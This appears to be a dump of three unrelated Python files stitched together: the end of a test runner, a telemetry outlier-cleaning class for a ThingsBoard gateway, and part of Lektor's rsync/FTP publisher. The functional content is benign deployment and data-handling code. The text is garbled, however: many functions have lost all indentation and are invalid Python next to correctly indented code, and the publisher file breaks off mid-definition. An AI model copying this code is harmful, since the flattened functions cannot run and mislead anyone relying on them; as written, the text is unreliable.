assert skipped, "Not able to skip test " + test
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
    """If the first arg is 'random...' replace args with randomly chosen tests."""
    if not args:
        return args
    first = args[0]
    if not first.startswith('random'):
        return args
    num_tests, base_module, relevant_modes = get_random_test_parameters(first[6:])
    for module in modules:
        if hasattr(module, base_module):
            base = getattr(module, base_module)
            chosen = choose_random_tests(base, num_tests, relevant_modes)
            print_random_test_statistics(num_tests)
            return chosen
    return args
def get_random_test_parameters(arg):
    """Decode the suffix of a 'random*' argument.

    '' -> 1 test from the default core mode; 'other7'/'browser7' select that
    suite; a trailing number sets how many tests to pick.
    """
    base_module = default_core_test_mode
    relevant_modes = core_test_modes
    num_tests = 1
    if arg:
        num_str = arg
        for prefix in ('other', 'browser'):
            if arg.startswith(prefix):
                base_module = prefix
                relevant_modes = [prefix]
                num_str = arg.replace(prefix, '')
                break
        num_tests = int(num_str)
    return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
    """Print the confidence estimate for a random test sample.

    Also registers an atexit hook that repeats the estimate when the runner
    finishes.
    """
    deviation = 0.5 / math.sqrt(num_tests)
    pass_rate = 100.0 * (1.0 - deviation)
    print()
    print('running those %d randomly-selected tests. if they all pass, then there is a '
          'greater than 95%% chance that at least %.2f%% of the test suite will pass'
          % (num_tests, pass_rate))
    print()

    def _report():
        print('if all tests passed then there is a greater than 95%% chance that at least '
              '%.2f%% of the test suite will pass'
              % (pass_rate))
    atexit.register(_report)
def load_test_suites(args, modules):
    """Resolve requested test names against modules and build per-module suites.

    Returns (list of (module name, suite) pairs, set of names that matched
    no module).
    """
    loader = unittest.TestLoader()
    unmatched = set(args)
    suites = []
    for module in modules:
        matched = []
        for name in list(unmatched):
            try:
                # attrgetter handles dotted 'suite.test' paths
                operator.attrgetter(name)(module)
            except AttributeError:
                continue
            matched.append(name)
            unmatched.remove(name)
        if matched:
            loaded = loader.loadTestsFromNames(sorted(matched), module)
            tests = flattened_tests(loaded)
            suite = suite_for_module(module, tests)
            for test in tests:
                suite.addTest(test)
            suites.append((module.__name__, suite))
    return suites, unmatched
def flattened_tests(loaded_tests):
    """Flatten unittest's nested suite-of-suites into a single flat list."""
    return [test for subsuite in loaded_tests for test in subsuite]
def suite_for_module(module, tests):
    """Pick a parallel suite for big multi-core runs, else a plain TestSuite.

    Parallelism is only supported for test_core/test_other and is disabled
    when EMTEST_SAVE_DIR is set.
    """
    parallelizable = module.__name__ in ('test_core', 'test_other')
    if not EMTEST_SAVE_DIR:
        if parallelizable and len(tests) > 1 and parallel_testsuite.num_cores() > 1:
            return parallel_testsuite.ParallelTestSuite(len(tests))
    return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
    """Parse command-line arguments.

    `args` is the full argv including the program name (main() passes
    sys.argv); everything after it is treated as a test name.
    """
    parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
    parser.add_argument('tests', nargs='*')
    # Bug fix: the `args` parameter used to be ignored and the parser read
    # sys.argv implicitly, making the function untestable and surprising.
    # Parse the caller-supplied argv (minus the program name) instead.
    return parser.parse_args(args[1:])
def main(args):
    """Runner entry point: resolve, filter and execute the requested tests.

    Returns the process exit code (number of failures, or 1 for unknown
    test names).
    """
    options = parse_args(args)
    check_js_engines()
    # bare 'test_foo' names default to the default core-mode suite
    tests = [default_core_test_mode + '.' + t if t.startswith('test_') else t
             for t in options.tests]
    modules = get_and_import_modules()
    all_tests = get_all_tests(modules)
    tests = tests_with_expanded_wildcards(tests, all_tests)
    tests = skip_requested_tests(tests, modules)
    tests = args_for_random_tests(tests, modules)
    suites, unmatched_tests = load_test_suites(tests, modules)
    if unmatched_tests:
        print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
        return 1
    return run_tests(options, suites)
if __name__ == '__main__':
    # Exit with the failure count from main(); Ctrl-C exits with code 1
    # instead of dumping a traceback.
    try:
        sys.exit(main(sys.argv))
    except KeyboardInterrupt:
        logger.warning('KeyboardInterrupt')
        sys.exit(1)
|
clean_data.py | # To specifically ignore ConvergenceWarnings:
import warnings
from collections import defaultdict
from functools import partial
from json import load
from os import path
import numpy as np
from tsmoothie import ExponentialSmoother, ConvolutionSmoother
import datetime
import threading
from time import sleep
from sklearn.cluster import KMeans
import logging
import logging.config
import logging.handlers
log = logging.getLogger('service')
logclean = logging.getLogger("cleaning")
class DataCleaning:
    """Streaming telemetry cleaner: keeps per-sensor windows of recent
    samples and clamps outliers using the method configured in cleaning.json.
    """

    # Layout of each per-sensor record (a plain list) kept in the caller's
    # device list:
    indexOfDeviceName = 0  # [0] device name (str)
    indexOfSensorName = 1  # [1] sensor/telemetry key (str)
    indexOfTelemetry = 2   # [2] recent data points (list)
    indexOfTimeSeries = 3  # [3] timestamps matching the data points (list)
    indexOfSeries = 4      # [4] defaultdict of numpy arrays used by the smoothers
    # Sentinel substituted for "NaN" inputs so they stand out as outliers.
    obviousOutlier = 999999
    # Parsed contents of cleaning.json; populated by the background loader.
    cleaningConfig = None

    def __init__(self):
        # start thread that loads the cleaning configuration in the background
        # NOTE(review): the thread is non-daemon; if get_cleaning_config keeps
        # re-running (see its retry logic) it can prevent interpreter exit —
        # confirm whether it should be marked daemon.
        t = threading.Thread(target=self.get_cleaning_config)
        t.start()
def createDevice(self, deviceList, data):
try:
newDeviceQueue = []
# add each sensor in incoming device to sub array in list_of_devices (that exists in tb_gateway_service.py)
for telemetry in data["telemetry"]["values"]:
newDeviceQueue.append(self.getTelemetryData(data, telemetry))
return newDeviceQueue
except Exception as e:
log.exception(e)
def doesDeviceExist(self, deviceList, data):
try:
index = -1
# if device exists in list_of_devices (in tb_gateway_service.py) return that index, otherwise return -1
for i in range(len(deviceList)):
if data["deviceName"] == deviceList[i][0][self.indexOfDeviceName]:
index = i
return index
except Exception as e:
log.exception(e)
def getTelemetryData(self, data, telemetry):
try:
# create sub arrays
deviceArray = []
telemetryArray = []
timeseriesArray = []
# add name of device and name sensor
deviceArray.append(data["deviceName"])
deviceArray.append(telemetry)
# add data point and the timestamp
telemetryArray.append(self.check_type(data["telemetry"]["values"][telemetry])) # return obvious deviation if data point is NaN
timeseriesArray.append(data["telemetry"]["ts"])
# add a dictionary in which cleaning related data is stored
series = defaultdict(partial(np.ndarray, shape=(1, 1), dtype='float32'))
deviceArray.append(telemetryArray)
deviceArray.append(timeseriesArray)
deviceArray.append(series)
return deviceArray
except Exception as e:
log.exception(e)
def addTelemetry(self, deviceList, data, deviceIndex):
    """Append new samples for every sensor of an existing device, cleaning
    outliers with the method configured for each sensor.

    NOTE(review): `i` indexes deviceList[deviceIndex] in lockstep with the
    iteration order of the incoming values dict — this assumes that order
    matches the order records were created in createDevice. Confirm against
    the caller.
    """
    try:
        i = 0
        for telemetry in data["telemetry"]["values"]:
            series = deviceList[deviceIndex][i][self.indexOfSeries]
            # Control data type for observed value
            data_point = self.check_type(data["telemetry"]["values"][telemetry])
            # get method and other params from cleaning config
            cleaningMethod, window_len, std = self.get_cleaning_method(deviceList, deviceIndex, telemetry)
            debug_data = [0]
            # controls size of list (drop oldest samples beyond the window)
            while (len(deviceList[deviceIndex][i][self.indexOfTelemetry]) > window_len):
                self.removeFirstElements(deviceList, deviceIndex, telemetry)
            # cleaning begins when length is greater than specified windows_len
            if (len(deviceList[deviceIndex][i][self.indexOfTelemetry]) >= window_len):
                if(cleaningMethod == "exponentialSmoother"):
                    data_point, debug_data = self._exponentialSmoother(data_point, series, window_len, std)
                elif(cleaningMethod == "convolutionSmoother"):
                    data_point, debug_data = self._convolutionSmoother(data_point, series, window_len, std)
                elif (cleaningMethod == "kmeans"):
                    data_point, debug_data = self._kmeans(data_point, series, window_len, std)
                # debug_data[0] == 1 flags "outlier was corrected"; log details
                if debug_data[0] == 1:
                    time_of_cleaning = datetime.datetime.utcfromtimestamp(int(data["telemetry"]["ts"]) / 1000).strftime('%Y-%m-%d %H:%M:%S')
                    strerror = "# -- Outlier detected - " + str(time_of_cleaning)+ " " + str(deviceList[deviceIndex][i][self.indexOfDeviceName])+ " " + str(deviceList[deviceIndex][i][self.indexOfSensorName]) +\
                        "\t\tObserved value- " + str(debug_data[1]) + " Lower boundary- " + str(debug_data[2]) + " Upper boundary- " + str(debug_data[3]) + " Corrected value to- " + str(debug_data[4])
                    logclean.debug(str(strerror))
            # keep the numpy history used by the smoothers at 2*window_len
            series['original'] = np.insert(series['original'], series['original'].size, [[data_point]])
            if series['original'].size > window_len * 2:
                series['original'] = series['original'][series['original'].size - window_len * 2:]
            # add data point with timestamp to time series
            deviceList[deviceIndex][i][self.indexOfTelemetry].append(data_point)
            deviceList[deviceIndex][i][self.indexOfTimeSeries].append(data["telemetry"]["ts"])  # adding timeseries
            i += 1
    except Exception as e:
        log.exception(e)
def removeFirstElements(self, deviceList, deviceIndex, telemetry):
try:
# remove first data point with its' timestamp
i = 0
for sensor in deviceList[deviceIndex]:
if sensor[1] == telemetry:
break
else:
i += 1
deviceList[deviceIndex][i][self.indexOfTelemetry].pop(0)
deviceList[deviceIndex][i][self.indexOfTimeSeries].pop(0)
except Exception as e:
log.exception(e)
def check_type(self, data_point):
# check if data point is valid type, if not make it valid but obvious outlier
if isinstance(data_point, str):
if data_point == "NaN":
return self.obviousOutlier
else:
return float(data_point)
else:
return data_point
def get_cleaning_config(self):
    """Load cleaning.json into self.cleaningConfig (runs on the thread
    started by __init__), retrying after 60s on failure.

    NOTE(review): the retry is implemented as sleep + recursive self-call
    rather than a loop; every cycle adds a Python stack frame, so a process
    that keeps failing (or, if the sleep/recurse is meant to run
    unconditionally for periodic reloads, any long-running process) will
    eventually hit RecursionError after ~1000 cycles. A `while True` loop
    would be safer — confirm intended semantics.
    """
    try:
        # loads cleaning.json to update current cleaning config
        config_file = path.abspath("thingsboard_gateway/config/cleaning.json")
        with open(config_file) as conf:
            self.cleaningConfig = load(conf)
    except Exception as e:
        log.exception(e)
        sleep(60)
        self.get_cleaning_config()
def check_if_cleaning_is_specified_for_all(self, deviceList):
try:
# checks if cleaning is specified
i = 0
for mpoint in deviceList:
j = 0
for attribute in deviceList[i][0]:
if(isinstance(attribute, str) and j == 0):
if(not self.check_if_cleaning_is_specified(attribute)):
exceptionString = "Cleaning.json does does not specify cleaning for the endpoint " + attribute
log.debug(exceptionString)
j += 1
i += 1
except Exception as e:
log.exception(e)
def check_if_cleaning_is_specified(self, attribute):
try:
# checks if cleaning is specified for a specific device
i = 0
for mpoint in self.cleaningConfig["devicesWithCleaning"]:
if(self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"] != ""):
nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"] + ", " + self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"]
else:
nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"]
if(nameOfDevice == attribute):
return True
i += 1
return False
except Exception as e:
log.exception(e)
def get_cleaning_method(self, deviceList, deviceIndex, telemetry):
    """Look up (cleaningMethod, windowLen, standardDeviation) for one sensor.

    Sensor-specific settings win over the matched device's defaults.

    NOTE(review): if no config entry matches the device name, the loop falls
    through with i == len(devicesWithCleaning) and the default lookup below
    raises IndexError; the except swallows it and the method returns None,
    which callers then crash unpacking. Confirm whether a global default was
    intended for that case.
    """
    try:
        # find the record index of this sensor within the device
        i = 0
        for sensor in deviceList[deviceIndex]:
            if sensor[1] == telemetry:
                break
            else:
                i += 1
        # returns the current cleaning method
        deviceNameToCheck = deviceList[deviceIndex][i][self.indexOfDeviceName]
        i = 0
        for mpoint in self.cleaningConfig["devicesWithCleaning"]:
            # display name is "mpointName" or "mpointName, datatypeName"
            if (self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"] != ""):
                nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"] + ", " + self.cleaningConfig["devicesWithCleaning"][i]["datatypeName"]
            else:
                nameOfDevice = self.cleaningConfig["devicesWithCleaning"][i]["mpointName"]
            if (nameOfDevice == deviceNameToCheck):
                j = 0
                for specificCleaning in self.cleaningConfig["devicesWithCleaning"][i]["sensorsWithSpecificCleaning"]:
                    if (telemetry == specificCleaning["sensorName"] and j == 0):
                        return specificCleaning["cleaningMethod"], specificCleaning["windowLen"], specificCleaning["standardDeviation"]
                    j += 1
                break
            i += 1
        # fall back to the matched device's default settings
        return self.cleaningConfig["devicesWithCleaning"][i]["defaultCleaning"], \
            self.cleaningConfig["devicesWithCleaning"][i]["defaultWindowLen"], self.cleaningConfig["devicesWithCleaning"][i]["defaultStandardDeviation"]
    except Exception as e:
        log.exception(e)
def _kmeans(self, data_point, series, window_len, std):
    """K-means based outlier detection -- UNFINISHED.

    NOTE(review): this fits a 2-cluster KMeans on the history plus the new
    point but then ignores the fitted model entirely: it always returns the
    observed value unchanged together with debug_data[0] == 1 and the
    placeholder boundaries (3, 3), so addTelemetry logs "Outlier detected"
    for every sample cleaned with this method. Looks like work in progress —
    confirm before relying on it.
    """
    kmeans = KMeans(n_clusters=2)
    # build a 2-column array [[0, value], ...] from the history + new point
    clean = np.column_stack([0, 0])
    for i in series["original"]:
        temp = [[0, i]]
        clean = np.vstack([clean, temp])
    temp = [[0, data_point]]
    clean = np.vstack([clean, temp])
    kmeans.fit(clean)
    # predictions are computed but never used (see NOTE above)
    y_kmeans = kmeans.predict(clean)
    j = 0
    debug_data = [1, data_point, 3, 3, data_point]
    return data_point, debug_data
def _exponentialSmoother(self, data_point, series, window_len, std):
    """Exponential smoothing with sigma-interval clamping.

    Returns (possibly clamped data_point, debug_data): debug_data is [0]
    when the point was inside the band, or
    [1, observed, low, up, corrected] when it was clamped to a boundary.
    """
    smoother = ExponentialSmoother(window_len=window_len // 2, alpha=0.4)
    smoother.smooth(series['original'][-window_len:])
    series['smooth'] = np.insert(series['smooth'], series['smooth'].size, smoother.smooth_data[-1][-1])
    lower, upper = smoother.get_intervals('sigma_interval', n_sigma=std)
    series['low'] = np.insert(series['low'], series['low'].size, lower[-1][-1])
    series['up'] = np.insert(series['up'], series['up'].size, upper[-1][-1])
    low_bound = series['low'][-1]
    up_bound = series['up'][-1]
    debug_data = [0]
    if data_point > up_bound:
        debug_data = [1, data_point, low_bound, up_bound, up_bound]
        data_point = up_bound
        series['original'][-1] = data_point
    elif data_point < low_bound:
        debug_data = [1, data_point, low_bound, up_bound, low_bound]
        data_point = low_bound
        series['original'][-1] = data_point
    # keep the derived histories at most window_len long
    if series['smooth'].size > window_len:
        for key in ('smooth', 'low', 'up'):
            series[key] = series[key][series[key].size - window_len:]
    return data_point, debug_data
def _convolutionSmoother(self, data_point, series, window_len, std):
    """Convolution smoothing with sigma-interval clamping.

    Same contract as _exponentialSmoother but using a flat ('ones')
    convolution window over the full window_len.
    """
    smoother = ConvolutionSmoother(window_len=window_len, window_type='ones')
    smoother.smooth(series['original'][-window_len:])
    series['smooth'] = np.insert(series['smooth'], series['smooth'].size, smoother.smooth_data[-1][-1])
    lower, upper = smoother.get_intervals('sigma_interval', n_sigma=std)
    series['low'] = np.insert(series['low'], series['low'].size, lower[-1][-1])
    series['up'] = np.insert(series['up'], series['up'].size, upper[-1][-1])
    low_bound = series['low'][-1]
    up_bound = series['up'][-1]
    debug_data = [0]
    if data_point > up_bound:
        debug_data = [1, data_point, low_bound, up_bound, up_bound]
        data_point = up_bound
        series['original'][-1] = data_point
    elif data_point < low_bound:
        debug_data = [1, data_point, low_bound, up_bound, low_bound]
        data_point = low_bound
        series['original'][-1] = data_point
    # keep the derived histories at most window_len long
    if series['smooth'].size > window_len:
        for key in ('smooth', 'low', 'up'):
            series[key] = series[key][series[key].size - window_len:]
    return data_point, debug_data
|
publisher.py | import errno
import hashlib
import os
import posixpath
import queue
import select
import shutil
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from ftplib import Error as FTPError
from io import BytesIO
from werkzeug import urls
from lektor.exception import LektorException
from lektor.utils import locate_executable
from lektor.utils import portable_popen
def _patch_git_env(env_overrides, ssh_command=None):
env = dict(os.environ)
env.update(env_overrides or ())
keys = [
("GIT_COMMITTER_NAME", "GIT_AUTHOR_NAME", "Lektor Bot"),
("GIT_COMMITTER_EMAIL", "GIT_AUTHOR_EMAIL", "bot@getlektor.com"),
]
for key_a, key_b, default in keys:
value_a = env.get(key_a)
value_b = env.get(key_b)
if value_a:
if not value_b:
env[key_b] = value_a
elif value_b:
if not value_a:
env[key_a] = value_b
else:
env[key_a] = default
env[key_b] = default
if ssh_command is not None and not env.get("GIT_SSH_COMMAND"):
env["GIT_SSH_COMMAND"] = ssh_command
return env
def _write_ssh_key_file(temp_fn, credentials):
if credentials:
key_file = credentials.get("key_file")
if key_file is not None:
return key_file
key = credentials.get("key")
if key:
parts = key.split(":", 1)
if len(parts) == 1:
kt = "RSA"
else:
kt, key = parts
with open(temp_fn, "w") as f:
f.write("-----BEGIN %s PRIVATE KEY-----\n" % kt.upper())
for x in range(0, len(key), 64):
f.write(key[x : x + 64] + "\n")
f.write("-----END %s PRIVATE KEY-----\n" % kt.upper())
os.chmod(temp_fn, 0o600)
return temp_fn
return None
def _get_ssh_cmd(port=None, keyfile=None):
ssh_args = []
if port:
ssh_args.append("-p %s" % port)
if keyfile:
ssh_args.append('-i "%s"' % keyfile)
return "ssh %s" % " ".join(ssh_args)
@contextmanager
def _temporary_folder(env):
base = env.temp_path
try:
os.makedirs(base)
except OSError:
pass
folder = tempfile.mkdtemp(prefix=".deploytemp", dir=base)
scratch = os.path.join(folder, "scratch")
os.mkdir(scratch)
os.chmod(scratch, 0o755)
try:
yield scratch
finally:
try:
shutil.rmtree(folder)
except (IOError, OSError):
pass
class PublishError(LektorException):
    """Raised by publishers if something goes wrong during deployment."""
class Command(object):
    """Run a subprocess and stream its stdout/stderr as decoded text lines.

    With capture=True (default), iterating the instance yields output lines
    as they arrive; silent=True discards all output instead.
    """

    def __init__(self, argline, cwd=None, env=None, capture=True, silent=False):
        """Spawn `argline` with os.environ augmented by `env`."""
        environ = dict(os.environ)
        if env:
            environ.update(env)
        kwargs = {"cwd": cwd, "env": environ}
        if silent:
            # Route all output to devnull; capturing would be pointless.
            self.devnull = open(os.devnull, "rb+")
            kwargs["stdout"] = self.devnull
            kwargs["stderr"] = self.devnull
            capture = False
        if capture:
            kwargs["stdout"] = subprocess.PIPE
            kwargs["stderr"] = subprocess.PIPE
        self.capture = capture
        self._cmd = portable_popen(argline, **kwargs)

    def wait(self):
        """Wait for the process, closing devnull if we opened one."""
        returncode = self._cmd.wait()
        if hasattr(self, "devnull"):
            self.devnull.close()
        return returncode

    @property
    def returncode(self):
        return self._cmd.returncode

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, tb):
        self._cmd.wait()

    def __iter__(self):
        """Yield decoded output lines from stdout and stderr as they arrive."""
        if not self.capture:
            raise RuntimeError("Not capturing")
        # Windows platforms do not have select() for files
        if os.name == "nt":
            q = queue.Queue()

            def reader(stream):
                # pump one stream into the queue; an empty read marks EOF
                while True:
                    line = stream.readline()
                    q.put(line)
                    if not line:
                        break

            t1 = threading.Thread(target=reader, args=(self._cmd.stdout,))
            # Fix: Thread.setDaemon() is deprecated since Python 3.10 and
            # removed in 3.13; assign the `daemon` attribute instead.
            t1.daemon = True
            t2 = threading.Thread(target=reader, args=(self._cmd.stderr,))
            t2.daemon = True
            t1.start()
            t2.start()
            outstanding = 2
            while outstanding:
                item = q.get()
                if not item:
                    # one reader hit EOF
                    outstanding -= 1
                else:
                    yield item.rstrip().decode("utf-8", "replace")
        # Otherwise we can go with select()
        else:
            streams = [self._cmd.stdout, self._cmd.stderr]
            while streams:
                # iterates the (readable, writable, exceptional) triple;
                # writable is always empty here
                for l in select.select(streams, [], streams):
                    for stream in l:
                        line = stream.readline()
                        if not line:
                            if stream in streams:
                                streams.remove(stream)
                            break
                        yield line.rstrip().decode("utf-8", "replace")

    def safe_iter(self):
        """Iterate output lines, guaranteeing the process is waited on."""
        with self:
            for line in self:
                yield line

    @property
    def output(self):
        return self.safe_iter()
class Publisher(object):
    """Base class for deployment publishers.

    Subclasses implement publish() as a generator yielding progress lines.
    """

    def __init__(self, env, output_path):
        self.env = env
        # absolute path of the built site that will be published
        self.output_path = os.path.abspath(output_path)

    def fail(self, message):
        """Abort publishing by raising a PublishError."""
        raise PublishError(message)

    def publish(self, target_url, credentials=None, **extra):
        """Publish output_path to `target_url`; implemented by subclasses."""
        raise NotImplementedError()
class RsyncPublisher(Publisher):
    """Publishes the build output via rsync (optionally over ssh)."""

    def get_command(self, target_url, tempdir, credentials):
        """Assemble the rsync Command for `target_url`.

        Supports ?exclude=... (repeatable), ?delete to enable
        --delete-delay, and ssh port/keyfile handling via -e.
        """
        credentials = credentials or {}
        argline = ["rsync", "-rclzv", "--exclude=.lektor"]
        target = []
        env = {}
        options = target_url.decode_query()
        exclude = options.getlist("exclude")
        for file in exclude:
            argline.extend(("--exclude", file))
        # "?delete" (bare), "on", "yes", "true" or "1" enable deletion; an
        # absent key yields the default False, which is NOT in the tuple.
        delete = options.get("delete", False) in ("", "on", "yes", "true", "1", None)
        if delete:
            argline.append("--delete-delay")
        keyfile = _write_ssh_key_file(
            os.path.join(tempdir, "ssh-auth-key"), credentials
        )
        if target_url.port is not None or keyfile is not None:
            argline.append("-e")
            argline.append(_get_ssh_cmd(target_url.port, keyfile))
        # explicit credentials win over a username embedded in the URL
        username = credentials.get("username") or target_url.username
        if username:
            target.append(username + "@")
        if target_url.ascii_host is not None:
            target.append(target_url.ascii_host)
            target.append(":")
        target.append(target_url.path.rstrip("/") + "/")
        # trailing slash: rsync the *contents* of output_path
        argline.append(self.output_path.rstrip("/\\") + "/")
        argline.append("".join(target))
        return Command(argline, env=env)

    def publish(self, target_url, credentials=None, **extra):
        """Generator yielding rsync output lines while publishing."""
        with _temporary_folder(self.env) as tempdir:
            client = self.get_command(target_url, tempdir, credentials)
            with client:
                for line in client:
                    yield line
class FtpConnection(object):
    """Thin wrapper around ftplib that buffers human-readable log lines.

    All operations log failures into `log_buffer` (drained via drain_log())
    instead of raising, and remember created folders to avoid redundant
    MKD calls.
    """

    def __init__(self, url, credentials=None):
        credentials = credentials or {}
        self.con = self.make_connection()
        self.url = url
        # explicit credentials win over ones embedded in the URL
        self.username = credentials.get("username") or url.username
        self.password = credentials.get("password") or url.password
        self.log_buffer = []
        self._known_folders = set()

    def make_connection(self):
        """Return an unconnected ftplib client (overridden for TLS)."""
        from ftplib import FTP

        return FTP()

    def drain_log(self):
        """Yield buffered log lines (splitting multi-line chunks) and clear the buffer."""
        log = self.log_buffer[:]
        del self.log_buffer[:]
        for chunk in log:
            for line in chunk.splitlines():
                if not isinstance(line, str):
                    line = line.decode("utf-8", "replace")
                yield line.rstrip()

    def connect(self):
        """Connect, authenticate and chdir to the target path.

        Returns True on success; failures are logged and yield False.
        """
        options = self.url.decode_query()
        log = self.log_buffer
        log.append("000 Connecting to server ...")
        try:
            log.append(self.con.connect(self.url.ascii_host, self.url.port or 21))
        except Exception as e:
            log.append("000 Could not connect.")
            log.append(str(e))
            return False
        try:
            credentials = {}
            if self.username:
                credentials["user"] = self.username
            if self.password:
                credentials["passwd"] = self.password
            log.append(self.con.login(**credentials))
        except Exception as e:
            log.append("000 Could not authenticate.")
            log.append(str(e))
            return False
        # passive mode is on unless explicitly disabled via ?passive=...
        passive = options.get("passive") in ("on", "yes", "true", "1", None)
        log.append("000 Using passive mode: %s" % (passive and "yes" or "no"))
        self.con.set_pasv(passive)
        try:
            log.append(self.con.cwd(self.url.path))
        except Exception as e:
            log.append(str(e))
            return False
        log.append("000 Connected!")
        return True

    def mkdir(self, path, recursive=True):
        """Create a directory (and parents when recursive), remembering successes."""
        if not isinstance(path, str):
            path = path.decode("utf-8")
        if path in self._known_folders:
            return
        dirname, _ = posixpath.split(path)
        if dirname and recursive:
            self.mkdir(dirname)
        try:
            self.con.mkd(path)
        except FTPError as e:
            msg = str(e)
            # 550 means the folder already exists; anything else is an error
            if msg[:4] != "550 ":
                self.log_buffer.append(str(e))
                return
        self._known_folders.add(path)

    def append(self, filename, data):
        """Append string data to a remote file. Returns success as bool."""
        if not isinstance(filename, str):
            filename = filename.decode("utf-8")
        input = BytesIO(data.encode("utf-8"))
        try:
            self.con.storbinary("APPE " + filename, input)
        except FTPError as e:
            self.log_buffer.append(str(e))
            return False
        return True

    def get_file(self, filename, out=None):
        """Download a remote file.

        Returns the decoded text when `out` is None, otherwise the `out`
        object; returns None on failure (a missing file, 550, is silent).
        """
        if not isinstance(filename, str):
            filename = filename.decode("utf-8")
        getvalue = False
        if out is None:
            out = BytesIO()
            getvalue = True
        try:
            self.con.retrbinary("RETR " + filename, out.write)
        except FTPError as e:
            msg = str(e)
            if msg[:4] != "550 ":
                # Bug fix: log the message, not the exception object --
                # drain_log() calls .splitlines() on every buffered entry,
                # which an exception object does not have.
                self.log_buffer.append(str(e))
            return None
        if getvalue:
            return out.getvalue().decode("utf-8")
        return out

    def upload_file(self, filename, src, mkdir=False):
        """Upload `src` (string or file object) to `filename`. Returns bool."""
        if isinstance(src, str):
            src = BytesIO(src.encode("utf-8"))
        if mkdir:
            directory = posixpath.dirname(filename)
            if directory:
                self.mkdir(directory, recursive=True)
        if not isinstance(filename, str):
            filename = filename.decode("utf-8")
        try:
            self.con.storbinary("STOR " + filename, src, blocksize=32768)
        except FTPError as e:
            self.log_buffer.append(str(e))
            return False
        return True

    def rename_file(self, src, dst):
        """Rename src -> dst; on failure, try deleting dst and renaming again."""
        try:
            self.con.rename(src, dst)
        except FTPError as e:
            self.log_buffer.append(str(e))
            try:
                self.con.delete(dst)
            except Exception as e:
                self.log_buffer.append(str(e))
            try:
                self.con.rename(src, dst)
            except Exception as e:
                self.log_buffer.append(str(e))

    def delete_file(self, filename):
        """Delete a remote file, logging (not raising) failures."""
        # Bug fix: ftplib in Python 3 expects str command arguments; the old
        # code encoded str -> bytes here (a Python 2 remnant), which made
        # "DELE " + filename raise TypeError so every delete silently failed.
        # Normalize bytes -> str instead, matching the other methods.
        if not isinstance(filename, str):
            filename = filename.decode("utf-8")
        try:
            self.con.delete(filename)
        except Exception as e:
            self.log_buffer.append(str(e))

    def delete_folder(self, filename):
        """Delete a remote directory and forget it in the folder cache."""
        # Bug fix: same str/bytes inversion as delete_file; this also keeps
        # _known_folders keyed by str, matching what mkdir() stores.
        if not isinstance(filename, str):
            filename = filename.decode("utf-8")
        try:
            self.con.rmd(filename)
        except Exception as e:
            self.log_buffer.append(str(e))
        self._known_folders.discard(filename)
class FtpTlsConnection(FtpConnection):
    """FTP connection that secures control and data channels with TLS."""

    def make_connection(self):
        # Imported lazily so plain-FTP deployments never need TLS support.
        from ftplib import FTP_TLS

        return FTP_TLS()

    def connect(self):
        connected = super().connect()
        if connected:
            # Upgrade data connection to TLS.
            self.con.prot_p() # pylint: disable=no-member
        return connected
class FtpPublisher(Publisher):
    """Publishes build artifacts to an FTP server.

    Server state is tracked in a ``.lektor/listing`` file of
    ``artifact_name|checksum`` lines so unchanged artifacts can be
    skipped and stale ones deleted on later runs.
    """

    connection_class = FtpConnection

    def read_existing_artifacts(self, con):
        """Return (name -> checksum dict, set of duplicated names) from the
        server's ``.lektor/listing`` file; empty results if it is missing."""
        contents = con.get_file(".lektor/listing")
        if not contents:
            return {}, set()
        duplicates = set()
        rv = {}
        # Later records override earlier ones. There can be duplicate
        # entries if the file was not compressed.
        for line in contents.splitlines():
            items = line.split("|")
            if len(items) == 2:
                if not isinstance(items[0], str):
                    artifact_name = items[0].decode("utf-8")
                else:
                    artifact_name = items[0]
                if artifact_name in rv:
                    duplicates.add(artifact_name)
                rv[artifact_name] = items[1]
        return rv, duplicates

    def iter_artifacts(self):
        """Iterates over all artifacts in the build folder and yields the
        artifacts as ``(server_path, local_path, sha1_hexdigest)`` tuples.
        """
        for dirpath, dirnames, filenames in os.walk(self.output_path):
            # Prune ignored directories in place so os.walk skips them.
            dirnames[:] = [x for x in dirnames if not self.env.is_ignored_artifact(x)]
            for filename in filenames:
                if self.env.is_ignored_artifact(filename):
                    continue
                full_path = os.path.join(self.output_path, dirpath, filename)
                local_path = full_path[len(self.output_path) :].lstrip(os.path.sep)
                if os.path.altsep:
                    local_path = local_path.lstrip(os.path.altsep)
                h = hashlib.sha1()
                try:
                    with open(full_path, "rb") as f:
                        while 1:
                            item = f.read(4096)
                            if not item:
                                break
                            h.update(item)
                except IOError as e:
                    # A file deleted mid-walk is fine; anything else is not.
                    if e.errno != errno.ENOENT:
                        raise
                yield (
                    local_path.replace(os.path.sep, "/"),
                    full_path,
                    h.hexdigest(),
                )

    def get_temp_filename(self, filename):
